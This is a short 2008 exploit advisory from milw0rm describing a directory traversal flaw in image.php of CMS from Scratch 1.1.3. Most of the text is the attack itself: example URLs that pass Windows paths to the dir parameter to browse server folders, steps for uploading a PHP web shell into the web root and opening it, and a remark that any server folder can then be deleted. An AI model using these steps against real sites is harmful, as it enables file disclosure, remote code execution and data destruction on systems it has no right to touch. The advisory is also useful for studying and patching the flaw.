CMS from Scratch 1.1.3 image.php Directory Traversal Vulnerability.pdf

1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 2 CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability 3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 4 5 author...: Stack 6 mail.....: Wanted 7 wanted by Egix 8 Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For founded it :d:) 9 10 Exploit : 11 # http://localhost/path/cms/images.php?dir=c: 12 Example : 13 # http://localhost/path/cms/images.php?dir=c:WINDOWS/system32/ 14 15 Exploit 2 : 16 17 and you can upload php file ==> php shell 18 for example upload the php shell in my localhost 19 c:AppServ/www/ 20 you go to link 21 # http://localhost/path/cms/images.php?dir=c:AppServ/www/ 22 after click to colon [parcourir] after select your shell and click upload 23 and go to link 24 # http://localhost/shell.php 25 desc :you can delete all folder of server 26 just clike to mark delete in folder selected to delete 27 28 thx : allah 29 30 # milw0rm.com [2008−05−29] Page 1/1 CMS from Scratch 1.1.3 image.php Directory Traversal Vulnerability Stack 05/29/2008